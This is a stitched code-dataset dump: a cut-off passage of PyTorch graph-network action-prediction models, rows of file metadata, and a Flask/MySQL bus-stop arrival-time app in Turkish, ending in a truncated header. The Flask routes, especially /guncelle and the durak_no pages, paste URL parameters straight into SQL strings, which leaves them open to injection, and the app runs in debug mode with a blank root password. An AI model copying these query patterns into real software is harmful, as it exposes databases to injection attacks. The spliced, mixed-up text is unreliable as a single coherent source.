attn_embedding = torch.cat([h, goalObjectsVec.repeat(h.size(0)).view(h.size(0), -1), lstm_out.repeat(h.size(0)).view(h.size(0), -1)], 1)
attn_weights = F.softmax(self.attention(attn_embedding), dim=0)
scene_embedding = torch.mm(attn_weights.t(), h)
final_to_decode = torch.cat([scene_embedding, goal_embed, lstm_out.view(1,-1)], 1)
action = self.activation(self.fc1(final_to_decode))
action = self.activation(self.fc2(action))
action = self.activation(self.fc3(action))
action = F.softmax(action, dim=1)
#Predicting the first argument of the action
pred1_object = self.activation(self.p1_object(
torch.cat([final_to_decode.view(-1).repeat(self.n_objects).view(self.n_objects, -1), self.activation(self.embed(self.object_vec))], 1)))
pred1_object = self.activation(self.p2_object(pred1_object))
pred1_object = torch.sigmoid(self.p3_object(pred1_object))
pred1_no_object = self.activation(self.p1_no_object(final_to_decode))
pred1_no_object = self.activation(self.p2_no_object(pred1_no_object))
pred1_no_object = torch.sigmoid(self.p3_no_object(pred1_no_object))
# Predicting the second argument of the action
pred2_object = self.activation(self.q1_object(
torch.cat([final_to_decode.view(-1).repeat(self.n_objects).view(self.n_objects, -1), self.activation(self.embed(self.object_vec))], 1)))
pred2_object = self.activation(self.q2_object(pred2_object))
pred2_object = torch.sigmoid(self.q3_object(pred2_object))
pred2_no_object = self.activation(self.q1_no_object(final_to_decode))
pred2_no_object = self.activation(self.q2_no_object(pred2_no_object))
pred2_no_object = torch.sigmoid(self.q3_no_object(pred2_no_object))
pred2_state = self.activation(self.q1_state(final_to_decode))
pred2_state = self.activation(self.q2_state(pred2_state))
pred2_state = F.softmax(self.q3_state(pred2_state), dim = 1)
predicted_actions.append(torch.cat((action, pred1_object.view(1,-1), pred1_no_object, pred2_object.view(1,-1), pred2_no_object, pred2_state), 1).flatten())
return predicted_actions
class GGCN_metric_att_aseq_tool_Action(nn.Module):
def __init__(self,
in_feats,
n_objects,
n_hidden,
n_states,
n_layers,
etypes,
activation,
dropout):
super(GGCN_metric_att_aseq_tool_Action, self).__init__()
self.name = "GGCN_metric_att_aseq_tool_Action_" + str(n_hidden) + "_" + str(n_layers)
self.layers = nn.ModuleList()
self.layers.append(GatedHeteroRGCNLayer(in_feats, n_hidden, etypes, activation=activation))
for i in range(n_layers - 1):
self.layers.append(GatedHeteroRGCNLayer(n_hidden, n_hidden, etypes, activation=activation))
self.attention = nn.Sequential(nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden + 1, n_hidden), nn.Linear(n_hidden, 1))
self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
self.fc1 = nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden, n_hidden)
self.fc2 = nn.Linear(n_hidden, n_hidden)
self.fc3 = nn.Linear(n_hidden, len(possibleActions))
self.p1 = nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden, n_hidden)
self.p2 = nn.Linear(n_hidden, n_hidden)
self.p3 = nn.Linear(n_hidden, n_objects+1)
self.q1 = nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden, n_hidden)
self.q2 = nn.Linear(n_hidden, n_hidden)
self.q3 = nn.Linear(n_hidden, n_objects+1+n_states)
self.activation = nn.LeakyReLU()
self.metric1 = nn.Linear(in_feats, n_hidden)
self.metric2 = nn.Linear(n_hidden, n_hidden)
self.action_lstm = nn.LSTM(len(possibleActions) + n_objects + 1 + n_objects + 1 + n_states, n_hidden)
self.n_hidden = n_hidden
self.n_objects = n_objects
self.n_states = n_states
def forward(self, g_list, goalVec, goalObjectsVec, a_list, object_likelihoods):
a_list = [action2vec(i, self.n_objects, self.n_states) for i in a_list]
predicted_actions = []
lstm_hidden = (torch.randn(1, 1, self.n_hidden),torch.randn(1, 1, self.n_hidden))
goalObjectsVec = self.activation(self.embed(torch.Tensor(goalObjectsVec)))
goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
for ind,g in enumerate(g_list):
h = g.ndata['feat']
for i, layer in enumerate(self.layers):
h = layer(g, h)
metric_part = g.ndata['feat']
metric_part = self.activation(self.metric1(metric_part))
metric_part = self.activation(self.metric2(metric_part))
h = torch.cat([h, metric_part], dim = 1)
if (ind != 0):
lstm_out, lstm_hidden = self.action_lstm(a_list[ind-1].view(1,1,-1), lstm_hidden)
else:
lstm_out = torch.zeros(1, 1, self.n_hidden)
lstm_out = lstm_out.view(-1)
attn_embedding = torch.cat([h, goalObjectsVec.repeat(h.size(0)).view(h.size(0), -1), lstm_out.repeat(h.size(0)).view(h.size(0), -1), object_likelihoods[ind].view(h.size(0),-1)], 1)
attn_weights = F.softmax(self.attention(attn_embedding), dim=0)
scene_embedding = torch.mm(attn_weights.t(), h)
final_to_decode = torch.cat([scene_embedding, goal_embed, lstm_out.view(1,-1)], 1)
action = self.activation(self.fc1(final_to_decode))
action = self.activation(self.fc2(action))
action = self.activation(self.fc3(action))
action = F.softmax(action, dim=1)
pred1 = self.activation(self.p1(final_to_decode))
pred1 = self.activation(self.p2(pred1))
pred1 = F.softmax(self.activation(self.p3(pred1)), dim=1)
pred2 = self.activation(self.q1(final_to_decode))
pred2 = self.activation(self.q2(pred2))
pred2 = F.softmax(self.activation(self.q3(pred2)), dim=1)
predicted_actions.append(torch.cat((action, pred1, pred2), 1).flatten())
return predicted_actions
class GGCN_metric_att_aseq_tool_auto_Action(nn.Module):
def __init__(self,
in_feats,
n_objects,
n_hidden,
n_states,
n_layers,
etypes,
activation,
dropout):
super(GGCN_metric_att_aseq_tool_auto_Action, self).__init__()
self.name = "GGCN_metric_att_aseq_tool_auto_Action_" + str(n_hidden) + "_" + str(n_layers)
self.layers = nn.ModuleList()
self.layers.append(GatedHeteroRGCNLayer(in_feats, n_hidden, etypes, activation=activation))
for i in range(n_layers - 1):
self.layers.append(GatedHeteroRGCNLayer(n_hidden, n_hidden, etypes, activation=activation))
self.attention = nn.Sequential(nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden + 1, n_hidden), nn.Linear(n_hidden, 1))
self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
self.fc1 = nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden, n_hidden)
self.fc2 = nn.Linear(n_hidden, n_hidden)
self.fc3 = nn.Linear(n_hidden, len(possibleActions))
self.p1 = nn.Linear(len(possibleActions) + n_hidden + n_hidden + n_hidden + n_hidden, n_hidden)
self.p2 = nn.Linear(n_hidden, n_hidden)
self.p3 = nn.Linear(n_hidden, n_objects+1)
self.q1 = nn.Linear(len(possibleActions)+n_objects+1 + n_hidden + n_hidden + n_hidden + n_hidden, n_hidden)
self.q2 = nn.Linear(n_hidden, n_hidden)
self.q3 = nn.Linear(n_hidden, n_objects+1+n_states)
self.activation = nn.LeakyReLU()
self.metric1 = nn.Linear(in_feats, n_hidden)
self.metric2 = nn.Linear(n_hidden, n_hidden)
self.action_lstm = nn.LSTM(len(possibleActions) + n_objects + 1 + n_objects + 1 + n_states, n_hidden)
self.n_hidden = n_hidden
self.n_objects = n_objects
self.n_states = n_states
def forward(self, g_list, goalVec, goalObjectsVec, a_list, object_likelihoods):
a_list = [action2vec(i, self.n_objects, self.n_states) if i else None for i in a_list]
predicted_actions = []
lstm_hidden = (torch.randn(1, 1, self.n_hidden),torch.randn(1, 1, self.n_hidden))
goalObjectsVec = self.activation(self.embed(torch.Tensor(goalObjectsVec)))
goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
for ind,g in enumerate(g_list):
h = g.ndata['feat']
for i, layer in enumerate(self.layers):
h = layer(g, h)
metric_part = g.ndata['feat']
metric_part = self.activation(self.metric1(metric_part))
metric_part = self.activation(self.metric2(metric_part))
h = torch.cat([h, metric_part], dim = 1)
if (ind != 0):
lstm_out, lstm_hidden = self.action_lstm(a_list[ind-1].view(1,1,-1), lstm_hidden)
else:
lstm_out = torch.zeros(1, 1, self.n_hidden)
lstm_out = lstm_out.view(-1)
attn_embedding = torch.cat([h, goalObjectsVec.repeat(h.size(0)).view(h.size(0), -1), lstm_out.repeat(h.size(0)).view(h.size(0), -1), object_likelihoods[ind].view(h.size(0),-1)], 1)
attn_weights = F.softmax(self.attention(attn_embedding), dim=0)
scene_embedding = torch.mm(attn_weights.t(), h)
final_to_decode = torch.cat([scene_embedding, goal_embed, lstm_out.view(1,-1)], 1)
action = self.activation(self.fc1(final_to_decode))
action = self.activation(self.fc2(action))
action = self.activation(self.fc3(action))
action = F.softmax(action, dim=1)
pred_action_values = list(action[0])
ind_max_action = pred_action_values.index(max(pred_action_values))
one_hot_action = [0] * len(pred_action_values); one_hot_action[ind_max_action] = 1
one_hot_action = torch.Tensor(one_hot_action).view(1,-1)
pred1 = self.activation(self.p1(torch.cat([one_hot_action, final_to_decode], dim=1)))
pred1 = self.activation(self.p2(pred1))
pred1 = F.softmax(self.activation(self.p3(pred1)), dim=1)
pred2 = self.activation(self.q1(torch.cat([action, pred1, final_to_decode], dim=1)))
pred2 = self.activation(self.q2(pred2))
pred2 = F.softmax(self.activation(self.q3(pred2)), dim=1)
predicted_actions.append(torch.cat((action, pred1, pred2), 1).flatten())
return predicted_actions
class DGL_AGCN_Action_List(nn.Module):
def __init__(self,
in_feats,
n_objects,
n_hidden,
n_states,
n_layers,
etypes,
activation,
dropout,
num_states_in_list):
super(DGL_AGCN_Action_List, self).__init__()
self.name = "GatedHeteroRGCN_Attention_Action_List_" + str(n_hidden) + "_" + str(n_layers)
self.layers = nn.ModuleList()
self.layers.append(GatedHeteroRGCNLayer(in_feats, n_hidden, etypes, activation=activation))
for i in range(n_layers - 1):
self.layers.append(GatedHeteroRGCNLayer(n_hidden, n_hidden, etypes, activation=activation))
self.attention = nn.Linear(n_hidden + n_hidden, 1)
self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
self.fc1 = nn.Linear(n_hidden * num_states_in_list + n_hidden, n_hidden)
self.fc2 = nn.Linear(n_hidden, n_hidden)
self.fc3 = nn.Linear(n_hidden, len(possibleActions))
self.p1 = nn.Linear(n_hidden * num_states_in_list + n_hidden, n_hidden)
self.p2 = nn.Linear(n_hidden, n_hidden)
self.p3 = nn.Linear(n_hidden, n_objects+1)
self.q1 = nn.Linear(n_hidden * num_states_in_list + n_hidden, n_hidden)
self.q2 = nn.Linear(n_hidden, n_hidden)
self.q3 = nn.Linear(n_hidden, n_objects+1+n_states)
self.n_hidden = n_hidden
self.activation = nn.LeakyReLU()
self.num_states_in_list = num_states_in_list
def forward(self, g_list, goalVec, goalObjectsVec):
goalObjectsVec = self.activation(self.embed(torch.Tensor(goalObjectsVec)))
goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
scene_embedding_list = [torch.zeros(1,self.n_hidden) for i in range(self.num_states_in_list - len(g_list))]
for g in g_list:
h = g.ndata['feat']
for i, layer in enumerate(self.layers):
h = layer(g, h)
attn_embedding = torch.cat([h, goalObjectsVec.repeat(h.size(0)).view(h.size(0), -1)], 1)
attn_weights = F.softmax(self.attention(attn_embedding), dim=0)
# print(attn_weights)
scene_embedding = torch.mm(attn_weights.t(), h)
scene_embedding_list.append(scene_embedding)
scene_embedding = torch.cat(scene_embedding_list,1)
final_to_decode = torch.cat([scene_embedding, goal_embed], 1)
action = self.activation(self.fc1(final_to_decode))
action = self.activation(self.fc2(action))
action = self.activation(self.fc3(action))
action = F.softmax(action, dim=1)
pred1 = self.activation(self.p1(final_to_decode))
pred1 = self.activation(self.p2(pred1))
pred1 = F.softmax(self.activation(self.p3(pred1)), dim=1)
pred2 = self.activation(self.q1(final_to_decode))
pred2 = self.activation(self.q2(pred2))
pred2 = F.softmax(self.activation(self.q3(pred2)), dim=1)
return torch.cat((action, pred1, pred2), 1).flatten()
#############################################################################
class Metric_Action(nn.Module):
def __init__(self,
in_feats,
n_objects,
n_hidden,
n_states,
n_layers,
etypes,
activation,
dropout):
super(Metric_Action, self).__init__()
self.etypes = etypes
self.name = "Metric_Action_" + str(n_hidden) + "_" + str(n_layers)
self.layers = nn.ModuleList()
self.layers.append(nn.Linear(in_feats + n_objects*4, n_hidden))
for i in range(n_layers - 1):
self.layers.append(nn.Linear(n_hidden, n_hidden))
self.attention = nn.Linear(n_hidden + n_hidden, 1)
self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
self.fc1 = nn.Linear(n_hidden + n_hidden, n_hidden)
self.fc2 = nn.Linear(n_hidden, n_hidden)
self.fc3 = nn.Linear(n_hidden, len(possibleActions))
self.p1 = nn.Linear(n_hidden + n_hidden, n_hidden)
self.p2 = nn.Linear(n_hidden, n_hidden)
self.p3 = nn.Linear(n_hidden, n_objects+1)
self.q1 = nn.Linear(n_hidden + n_hidden, n_hidden)
self.q2 = nn.Linear(n_hidden, n_hidden)
self.q3 = nn.Linear(n_hidden, n_objects+1+n_states)
self.activation = nn.LeakyReLU()
def forward(self, g, goalVec, goalObjectsVec):
h = g.ndata['feat']
edgeMatrices = [g.adjacency_matrix(etype=t) for t in self.etypes]
edges = torch.cat(edgeMatrices, 1).to_dense()
h = torch.cat((h, edges), 1)
for i, layer in enumerate(self.layers):
h = self.activation(layer(h))
scene_embedding = torch.sum(h, dim=0).view(1,-1)
goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
final_to_decode = torch.cat([scene_embedding, goal_embed], 1)
action = self.activation(self.fc1(final_to_decode))
action = self.activation(self.fc2(action))
action = self.activation(self.fc3(action))
action = F.softmax(action, dim=1)
pred1 = self.activation(self.p1(final_to_decode))
pred1 = self.activation(self.p2(pred1))
pred1 = F.softmax(self.activation(self.p3(pred1)), dim=1)
pred2 = self.activation(self.q1(final_to_decode))
pred2 = self.activation(self.q2(pred2))
pred2 = F.softmax(self.activation(self.q3(pred2)), dim=1)
return torch.cat((action, pred1, pred2), 1).flatten()
class Metric_att_Action(nn.Module):
def __init__(self,
in_feats,
n_objects,
n_hidden,
n_states,
n_layers,
etypes,
activation,
dropout):
super(Metric_att_Action, self).__init__()
self.etypes = etypes
self.name = "Metric_att_Action_" + str(n_hidden) + "_" + str(n_layers)
self.layers = nn.ModuleList()
self.layers.append(nn.Linear(in_feats + n_objects*4, n_hidden))
for i in range(n_layers - 1):
self.layers.append(nn.Linear(n_hidden, n_hidden))
self.attention = nn.Linear(n_hidden + n_hidden, 1)
self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
self.fc1 = nn.Linear(n_hidden + n_hidden, n_hidden)
self.fc2 = nn.Linear(n_hidden, n_hidden)
self.fc3 = nn.Linear(n_hidden, len(possibleActions))
self.p1 = nn.Linear(n_hidden + n_hidden, n_hidden)
self.p2 = nn.Linear(n_hidden, n_hidden)
self.p3 = nn.Linear(n_hidden, n_objects+1)
self.q1 = nn.Linear(n_hidden + n_hidden, n_hidden)
self.q2 = nn.Linear(n_hidden, n_hidden)
self.q3 = nn.Linear(n_hidden, n_objects+1+n_states)
self.activation = nn.LeakyReLU()
def forward(self, g, goalVec, goalObjectsVec):
h = g.ndata['feat']
edgeMatrices = [g.adjacency_matrix(etype=t) for t in self.etypes]
edges = torch.cat(edgeMatrices, 1).to_dense()
h = torch.cat((h, edges), 1)
for i, layer in enumerate(self.layers):
h = self.activation(layer(h))
goalObjectsVec = self.activation(self.embed(torch.Tensor(goalObjectsVec)))
attn_embedding = torch.cat([h, goalObjectsVec.repeat(h.size(0)).view(h.size(0), -1)], 1)
attn_weights = F.softmax(self.attention(attn_embedding), dim=0)
scene_embedding = torch.mm(attn_weights.t(), h)
goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
final_to_decode = torch.cat([scene_embedding, goal_embed], 1)
action = self.activation(self.fc1(final_to_decode))
action = self.activation(self.fc2(action))
action = self.activation(self.fc3(action))
action = F.softmax(action, dim=1)
pred1 = self.activation(self.p1(final_to_decode))
pred1 = self.activation(self.p2(pred1))
pred1 = F.softmax(self.activation(self.p3(pred1)), dim=1)
pred2 = self.activation(self.q1(final_to_decode))
pred2 = self.activation(self.q2(pred2))
pred2 = F.softmax(self.activation(self.q3(pred2)), dim=1)
return torch.cat((action, pred1, pred2), 1).flatten() | 53.575442 | 192 | 0.629239 | 6,975 | 51,486 | 4.407168 | 0.027814 | 0.109759 | 0.064281 | 0.095185 | 0.946747 | 0.922902 | 0.909141 | 0.898439 | 0.890241 | 0.869876 | 0 | 0.025219 | 0.243697 | 51,486 | 961 | 193 | 53.575442 | 0.764221 | 0.096395 | 0 | 0.830325 | 0 | 0 | 0.012381 | 0.005531 | 0 | 0 | 0 | 0 | 0.001203 | 1 | 0.034898 | false | 0.001203 | 0.004813 | 0 | 0.078219 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
28643547a768f1dfb213da422ca91f76dc592da3 | 14,460 | py | Python | index.py | Brankhos/akilli_durak | d4325319c09a12ef11087a86c48d9fdbf2dbe7bf | [
"MIT"
] | null | null | null | index.py | Brankhos/akilli_durak | d4325319c09a12ef11087a86c48d9fdbf2dbe7bf | [
"MIT"
] | null | null | null | index.py | Brankhos/akilli_durak | d4325319c09a12ef11087a86c48d9fdbf2dbe7bf | [
"MIT"
] | null | null | null | from flask import Flask, request
import configs
import mysql.connector
from mysql.connector import errorcode
import numpy as np
import math
from math import pi
def shift(arr, num=1, fill_value=np.nan):
result = np.empty_like(arr)
if num > 0:
result[:num] = fill_value
result[num:] = arr[:-num]
elif num < 0:
result[num:] = fill_value
result[:num] = arr[-num:]
else:
result[:] = arr
return result
config = {
'user': 'root',
'password': '',
'host': 'localhost',
'raise_on_warnings': True
}
try:
cnx = mysql.connector.connect(**config)
print("FUTURES: Bağlantı başarılı")
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
print("FUTURES: Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
print("FUTURES: Database does not exist")
else:
print("FUTURES: ", err)
cnx.autocommit = True
refresh = '<meta http-equiv="refresh" content="5">'
app = Flask(__name__)
@app.route("/")
def home():
cursor = cnx.cursor()
try:
cursor.execute("USE {}".format(configs.durak_db))
except mysql.connector.Error as err:
print("Durak: Database {} does not exists.".format(configs.durak_db))
durak_text = "<h1>Durak seçiniz</h1>"
cursor.execute("SELECT * FROM information_schema.tables WHERE table_schema = 'duraklar'")
records_all = cursor.fetchall()
duraklar = "<br>".join("<a href=\"durak_no="+x[2]+"\">"+x[2][0:4]+" | "+x[2][4:].replace("_"," ").upper() +"</a>" for x in records_all)
html = refresh+durak_text + duraklar
cursor.close()
return html
@app.route("/debug")
def debug():
cursor = cnx.cursor()
try:
cursor.execute("USE {}".format(configs.durak_db))
except mysql.connector.Error as err:
print("Durak: Database {} does not exists.".format(configs.durak_db))
durak_text = "<h1>Durak seçiniz</h1>"
cursor.execute("SELECT * FROM information_schema.tables WHERE table_schema = 'duraklar'")
records_all = cursor.fetchall()
duraklar = "<br>".join("<a href=\"debug_durak_no="+x[2]+"\">"+x[2][0:4]+" | "+x[2][4:].replace("_"," ").upper() +"</a>" for x in records_all)
html = refresh + durak_text + duraklar
cursor.close()
return html
@app.route("/durak_no=<durak_no>")
def otobus(durak_no):
cursor = cnx.cursor()
print("-----------------")
try:
cursor.execute("USE {}".format(configs.durak_db))
except mysql.connector.Error as err:
print("Otobus: Database {} does not exists.".format(configs.durak_db))
cursor.execute("SELECT `otobus_no` FROM `" + durak_no + "`")
otobus_nolar = np.array(cursor.fetchall())
otobus_nolar = otobus_nolar.flatten()
try:
cursor.execute("USE {}".format(configs.otobus_db))
except mysql.connector.Error as err:
print("Otobus: Database {} does not exists.".format(configs.otobus_db))
oto_list_array = np.array([])
for otobusler in otobus_nolar:
try:
last_kalan_sure = 999
last_summe_text = ""
for max_oto in range(1,50):
kalan_sure = 999
stop_it = 0
exe_text= f"SELECT * FROM `{otobusler}_{max_oto}` WHERE `ulasildi` = '0' and id <= {int(durak_no[1:4])}"
cursor.execute(exe_text)
otobus_bilgisi = np.array(cursor.fetchall())
otobus_bilgisi = np.transpose(otobus_bilgisi)
otobus_x = otobus_bilgisi[1]
otobus_y = otobus_bilgisi[2]
otobus_x_shift = shift(otobus_x,fill_value=0)[1:]
otobus_y_shift = shift(otobus_y,fill_value=0)[1:]
otobus_y = otobus_y[1:]
otobus_x = otobus_x[1:]
#print(otobus_x)
#print(otobus_x_shift)
summe = np.array([])
for otob_index in range(otobus_y_shift.shape[0]):
#enlem x
#boylam y
lat1 = otobus_x[otob_index]
long1 = otobus_y[otob_index]
lat2 = otobus_x_shift[otob_index]
long2 = otobus_y_shift[otob_index]
d = math.acos(math.sin(pi * lat1 / 180.0) * math.sin(pi * lat2 / 180.0) + math.cos(pi * lat1 / 180.0) * math.cos(pi * lat2 / 180.0) * math.cos(pi * long2 / 180.0 - pi * long1 / 180.0)) * 6371
# https://qastack.info.tr/programming/13026675/calculating-distance-between-two-points-latitude-longitude
summe = np.append(summe,d)
summe = np.sum(summe)
otobus_hiz = otobus_bilgisi[4][0]
if otobus_hiz < 10:
otobus_hiz = 10
if summe == 0:
exe_text = f"SELECT * FROM `{otobusler}_{max_oto}` WHERE `id` = {int(durak_no[1:4])} or `id` = 0"
cursor.execute(exe_text)
sifir_oto = np.transpose(np.array(cursor.fetchall()))
lat1 =sifir_oto[1][0]
long1 = sifir_oto[2][0]
lat2 = sifir_oto[1][1]
long2 = sifir_oto[2][1]
d = math.acos(math.sin(pi * lat1 / 180.0) * math.sin(pi * lat2 / 180.0) + math.cos(pi * lat1 / 180.0) * math.cos(pi * lat2 / 180.0) * math.cos(pi * long2 / 180.0 - pi * long1 / 180.0)) * 6371
if d < 0.035:
kalan_sure_text = "Geldi"
stop_it = 1
else:
kalan_sure_text = "Geçti"
stop_it = 0
else:
kalan_sure = summe/otobus_hiz
kalan_saat = int(kalan_sure)
kalan_dakika = (kalan_sure % 1) * 60
kalan_saniye = (kalan_dakika % 1) * 60
if kalan_saat == 0:
kalan_saat_text =""
else:
kalan_saat_text = "{} st ".format(int(kalan_saat))
if kalan_dakika == 0:
kalan_dakika_text =""
else:
kalan_dakika_text = "{} dk ".format(int(kalan_dakika))
if kalan_saniye == 0:
kalan_saniye_text = ""
else:
kalan_saniye_text = "{} sn".format(int(kalan_saniye))
kalan_sure_text = kalan_saat_text+kalan_dakika_text+kalan_saniye_text
if kalan_sure < last_kalan_sure or summe == 0 or last_summe_text == "Geçti":
if max_oto != 1 or last_summe_text == "Geçti":
oto_list_array = oto_list_array[:-1]
oto_list_array = np.append(oto_list_array, f"{otobusler} | {kalan_sure_text}")
last_kalan_sure = kalan_sure
print(last_summe_text, "last_summe_text")
last_summe_text = kalan_sure_text
print(otobusler,kalan_sure_text, summe, otobus_hiz, "alt")
print(oto_list_array, "last one")
if stop_it == 1:
break
except Exception as a:
print(a)
print(oto_list_array)
html_head = "Durak numarası: {}<br>Durak adı: {}".format(durak_no[:4],durak_no[4:].replace("_"," ").upper())
html_oto_list = "<br>" + "<br>".join(x for x in oto_list_array)
html = refresh + html_head + html_oto_list
cursor.close()
return html
@app.route("/debug_durak_no=<durak_no>")
def debug_durak_no(durak_no):
cursor = cnx.cursor()
print("-----------------")
try:
cursor.execute("USE {}".format(configs.durak_db))
except mysql.connector.Error as err:
print("Otobus: Database {} does not exists.".format(configs.durak_db))
cursor.execute("SELECT `otobus_no` FROM `" + durak_no + "`")
otobus_nolar = np.array(cursor.fetchall())
otobus_nolar = otobus_nolar.flatten()
try:
cursor.execute("USE {}".format(configs.otobus_db))
except mysql.connector.Error as err:
print("Otobus: Database {} does not exists.".format(configs.otobus_db))
oto_list_array = np.array([])
for otobusler in otobus_nolar:
try:
last_kalan_sure = 999
last_summe_text = ""
for max_oto in range(1, 50):
kalan_sure = 999
exe_text = f"SELECT * FROM `{otobusler}_{max_oto}` WHERE `ulasildi` = '0' and id <= {int(durak_no[1:4])}"
cursor.execute(exe_text)
otobus_bilgisi = np.array(cursor.fetchall())
otobus_bilgisi = np.transpose(otobus_bilgisi)
otobus_x = otobus_bilgisi[1]
otobus_y = otobus_bilgisi[2]
otobus_x_shift = shift(otobus_x, fill_value=0)[1:]
otobus_y_shift = shift(otobus_y, fill_value=0)[1:]
otobus_y = otobus_y[1:]
otobus_x = otobus_x[1:]
# print(otobus_x)
# print(otobus_x_shift)
summe = np.array([])
for otob_index in range(otobus_y_shift.shape[0]):
# enlem x
# boylam y
lat1 = otobus_x[otob_index]
long1 = otobus_y[otob_index]
lat2 = otobus_x_shift[otob_index]
long2 = otobus_y_shift[otob_index]
d = math.acos(math.sin(pi * lat1 / 180.0) * math.sin(pi * lat2 / 180.0) + math.cos(
pi * lat1 / 180.0) * math.cos(pi * lat2 / 180.0) * math.cos(
pi * long2 / 180.0 - pi * long1 / 180.0)) * 6371
# https://qastack.info.tr/programming/13026675/calculating-distance-between-two-points-latitude-longitude
summe = np.append(summe, d)
summe = np.sum(summe)
otobus_hiz = otobus_bilgisi[4][0]
if otobus_hiz < 10:
otobus_hiz = 10
if summe == 0:
exe_text = f"SELECT * FROM `{otobusler}_{max_oto}` WHERE `id` = {int(durak_no[1:4])} or `id` = 0"
cursor.execute(exe_text)
sifir_oto = np.transpose(np.array(cursor.fetchall()))
lat1 = sifir_oto[1][0]
long1 = sifir_oto[2][0]
lat2 = sifir_oto[1][1]
long2 = sifir_oto[2][1]
d = math.acos(math.sin(pi * lat1 / 180.0) * math.sin(pi * lat2 / 180.0) + math.cos(
pi * lat1 / 180.0) * math.cos(pi * lat2 / 180.0) * math.cos(
pi * long2 / 180.0 - pi * long1 / 180.0)) * 6371
if d < 0.035:
kalan_sure_text = "Geldi"
else:
kalan_sure_text = "Geçti"
else:
kalan_sure = summe / otobus_hiz
kalan_saat = int(kalan_sure)
kalan_dakika = (kalan_sure % 1) * 60
kalan_saniye = (kalan_dakika % 1) * 60
if kalan_saat == 0:
kalan_saat_text = ""
else:
kalan_saat_text = "{} st ".format(int(kalan_saat))
if kalan_dakika == 0:
kalan_dakika_text = ""
else:
kalan_dakika_text = "{} dk ".format(int(kalan_dakika))
if kalan_saniye == 0:
kalan_saniye_text = ""
else:
kalan_saniye_text = "{} sn".format(int(kalan_saniye))
kalan_sure_text = kalan_saat_text + kalan_dakika_text + kalan_saniye_text
oto_list_array = np.append(oto_list_array, f"{otobusler} | {kalan_sure_text}")
last_kalan_sure = kalan_sure
print(last_summe_text, "last_summe_text")
last_summe_text = kalan_sure_text
print(otobusler, kalan_sure_text, summe, otobus_hiz, "alt")
print(oto_list_array, "last one")
except Exception as a:
print(a)
print(oto_list_array)
html_head = "Durak numarası: {}<br>Durak adı: {}".format(durak_no[:4], durak_no[4:].replace("_", " ").upper())
html_oto_list = "<br>" + "<br>".join(x for x in oto_list_array)
html = refresh + html_head + html_oto_list
cursor.close()
return html
@app.route("/guncelle", methods=['GET'])
def guncelle():
cursor = cnx.cursor()
otobus = request.args.get('otobus', None)
x = request.args.get('x', None)
y = request.args.get('y', None)
hiz = request.args.get('hiz', None)
print(otobus,x,y,hiz)
try:
cursor.execute("USE {}".format(configs.otobus_db))
except mysql.connector.Error as err:
print("Otobus: Database {} does not exists.".format(configs.otobus_db))
cursor.execute("UPDATE `" + otobus + "` SET x = '" + x + "',y = '" + y + "',durak = '" + hiz + "' WHERE id = '0' ")
cursor.execute(f"SELECT * FROM {otobus} WHERE `ulasildi` ='0' and `durak` ='1'")
Result = cursor.fetchall()
for data in Result:
lat1 = data[1]
long1 = data[2]
lat2 = float(x)
long2 = float(y)
d = math.acos(math.sin(pi * lat1 / 180.0) * math.sin(pi * lat2 / 180.0) + math.cos(pi * lat1 / 180.0) * math.cos(
pi * lat2 / 180.0) * math.cos(pi * long2 / 180.0 - pi * long1 / 180.0)) * 6371
if d < 0.035:
cursor.execute(f"UPDATE {otobus} SET ulasildi ='1' WHERE `id` ='{data[0]}'")
cursor.close()
return "ok"
if __name__ == "__main__":
# This is used when running locally only. When deploying to Google App
# Engine, a webserver process such as Gunicorn will serve the app.
app.run(host='127.0.0.1', port=8080, debug=True)
# [END gae_flex_quickstart] | 39.400545 | 212 | 0.518811 | 1,738 | 14,460 | 4.10702 | 0.127733 | 0.016811 | 0.022415 | 0.023116 | 0.821659 | 0.803446 | 0.799243 | 0.797843 | 0.797843 | 0.797843 | 0 | 0.038841 | 0.355463 | 14,460 | 367 | 213 | 39.400545 | 0.727039 | 0.03278 | 0 | 0.75265 | 0 | 0.014134 | 0.126249 | 0.012346 | 0.007067 | 0 | 0 | 0 | 0 | 1 | 0.021201 | false | 0.007067 | 0.024735 | 0 | 0.067138 | 0.084806 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
288c715151f182ea3553ad4eddc890939729e58d | 204 | py | Python | tods/__init__.py | ZhuangweiKang/tods | fe3f55f8ccb306dd292c668e0f1154f1afdfa556 | [
"Apache-2.0"
] | 544 | 2020-09-21T06:02:33.000Z | 2022-03-27T07:16:32.000Z | tods/__init__.py | ZhuangweiKang/tods | fe3f55f8ccb306dd292c668e0f1154f1afdfa556 | [
"Apache-2.0"
] | 35 | 2020-09-21T06:33:13.000Z | 2022-03-11T14:20:21.000Z | tods/__init__.py | ZhuangweiKang/tods | fe3f55f8ccb306dd292c668e0f1154f1afdfa556 | [
